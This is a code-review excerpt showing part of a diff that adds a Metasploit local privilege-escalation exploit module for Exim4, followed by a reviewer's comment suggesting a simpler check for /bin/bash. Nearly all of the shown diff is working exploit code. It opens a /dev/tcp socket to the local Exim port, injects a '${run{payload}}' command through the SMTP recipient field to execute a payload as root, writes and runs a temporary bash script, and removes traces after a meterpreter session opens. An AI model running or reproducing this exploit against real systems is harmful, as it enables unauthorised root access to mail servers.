modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb

```diff
@@ -0,0 +1,212 @@
+      socket.puts("quit\n")
+      socket.close
+      socket_subsystem.shutdown
+    else
+      unless cmd_exec("/bin/bash -c \"exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\"; echo $?").chomp.to_i == 0
+        fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
+      end
+
+      bash_script = %|
+        #!/bin/bash
+
+        exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}
+        read -u 3 && echo $REPLY
+        echo "helo localhost" >&3
+        read -u 3 && echo $REPLY
+        echo "mail from:<>" >&3
+        read -u 3 && echo $REPLY
+        echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3
+        read -u 3 && echo $REPLY
+        echo "data" >&3
+        read -u 3 && echo $REPLY
+        for i in $(seq 1 30); do
+          echo 'Received: $i' >&3
+        done
+        echo "." >&3
+        read -u 3 && echo $REPLY
+        echo "quit" >&3
+        read -u 3 && echo $REPLY
+        exec 3<&-
+      |
+
+      @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+      write_file(@bash_script_path, bash_script)
+      register_file_for_cleanup(@bash_script_path)
+      cmd_exec("chmod +x #{@bash_script_path}")
+      cmd_exec("/bin/bash -c \"#{@bash_script_path}\"")
+    end
+
+    print_status('Payload sent, wait a few seconds...')
+    Rex.sleep(5)
+  end
+
+  def on_new_session(session)
+    super
+
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+      session.fs.file.rm(@payload_path)
+    else
+      session.shell_command_token("rm -f #{@payload_path}")
+    end
+  end
+
+  def check
+    exim = datastore['EXIMPATH'] ? datastore['EXIMPATH'] : 'exim'
+
+    res = cmd_exec("#{exim} -bV")
+    if res =~ /Exim version ([0-9\.]*) /i # Maybe improve the regex
+      version = Gem::Version.new($1)
+      vprint_status("Found exim version: #{version}")
+      if version >= target[:lower_version] && version <= target[:upper_version]
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
+    end
+
+    vprint_error("Couldn't retrieve exim version. You may want to set EXIMPATH.")
+    CheckCode::Unknown
+  end
+
+  def exploit
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+      end
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    if nosuid?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
+    end
+
+    unless datastore['PrependSetuid'] && datastore['PrependSetgid']
+      fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
+                                    'to get root privileges.')
+    end
+
+    if session.type == 'shell'
+      unless cmd_exec('/bin/bash --version; echo $?').chomp.to_i == 0
```

Comment:
As the version shouldn't matter, you could probably use `command_exists?` or check if the file is executable.

```ruby
unless command_exists?('/bin/bash')
```

```ruby
unless cmd_exec("test -x /bin/bash && echo true").to_s.include?('true')
```